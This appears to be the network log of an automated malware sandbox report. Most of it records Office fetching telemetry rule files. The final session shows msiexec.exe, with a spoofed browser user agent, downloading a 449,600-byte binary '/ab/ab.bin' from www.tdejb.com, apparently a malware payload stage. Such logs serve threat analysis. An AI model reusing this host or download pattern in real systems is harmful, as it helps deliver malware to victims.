                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              133192.168.2.64987713.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:11 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:11 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:11 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1407
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                              ETag: "0x8DC582BE687B46A"
                                                                                                              x-ms-request-id: ddb1afd1-c01e-008d-2acd-452eec000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093911Z-1746fd949bddgsvjhC1EWRum2c00000002vg000000001xtr
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:11 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              134192.168.2.64987813.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:11 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:12 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:12 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1370
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                              ETag: "0x8DC582BDE62E0AB"
                                                                                                              x-ms-request-id: f2a711fd-c01e-00a1-2bd1-457e4a000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093912Z-1746fd949bdlnsqphC1EWRurw000000002bg000000005d3c
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:12 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              135192.168.2.64988013.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:12 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:12 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:12 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1360
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                              ETag: "0x8DC582BEDC8193E"
                                                                                                              x-ms-request-id: d00fcd24-f01e-0096-3fd4-4510ef000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093912Z-1746fd949bdw2rg8hC1EWR11u400000002r0000000007vgb
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:12 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              136192.168.2.64988113.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:12 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:12 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:12 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1406
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                              ETag: "0x8DC582BEB16F27E"
                                                                                                              x-ms-request-id: 608090c1-401e-000a-38cc-454a7b000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093912Z-1746fd949bdfg4slhC1EWR34t000000002bg0000000051zd
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:12 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              137192.168.2.64987913.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:12 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:12 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:12 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1397
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                              ETag: "0x8DC582BE156D2EE"
                                                                                                              x-ms-request-id: bce9118a-101e-007a-55cc-45047e000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093912Z-1746fd949bdlqd7fhC1EWR6vt000000002tg000000000ee1
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:12 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              138192.168.2.64988213.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:13 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:14 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:13 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1369
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                              ETag: "0x8DC582BE32FE1A2"
                                                                                                              x-ms-request-id: 372ef671-001e-0017-68a3-460c3c000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093913Z-1746fd949bdlqd7fhC1EWR6vt000000002ng000000005zdb
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:14 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              139192.168.2.64988313.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:14 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:14 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:14 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1414
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                              ETag: "0x8DC582BE03B051D"
                                                                                                              x-ms-request-id: 1a13926b-001e-0049-0fcc-455bd5000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093914Z-1746fd949bdhk6hphC1EWRaw3c00000002b00000000021ru
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:14 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              140192.168.2.64988413.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:14 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:14 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:14 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1377
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                                                                                                              ETag: "0x8DC582BEAFF0125"
                                                                                                              x-ms-request-id: 4ebd02f3-101e-0028-39cb-458f64000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093914Z-1746fd949bdqpttnhC1EWRe1wg000000027g000000005u2u
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:14 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              141192.168.2.64988513.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:14 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:14 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:14 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1399
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                              ETag: "0x8DC582BE0A2434F"
                                                                                                              x-ms-request-id: 6270f7df-401e-0015-58d2-450e8d000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093914Z-1746fd949bd77mkmhC1EWR5efc00000002s00000000060vm
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:14 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              142192.168.2.64988613.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:14 UTC192OUTGET /rules/rule700150v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:14 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:14 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1362
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                              ETag: "0x8DC582BE54CA33F"
                                                                                                              x-ms-request-id: c769dbbb-401e-0048-7acc-450409000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093914Z-1746fd949bdxk6n6hC1EWRdr8c00000002d0000000002m5z
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:14 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              143192.168.2.649887202.71.109.2284437660C:\Windows\SysWOW64\msiexec.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:14 UTC167OUTGET /ab/ab.bin HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                              Host: www.tdejb.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-05 09:39:15 UTC223INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:14 GMT
                                                                                                              Server: Apache
                                                                                                              Last-Modified: Tue, 03 Dec 2024 03:27:16 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 449600
                                                                                                              Connection: close
                                                                                                              Content-Type: application/octet-stream
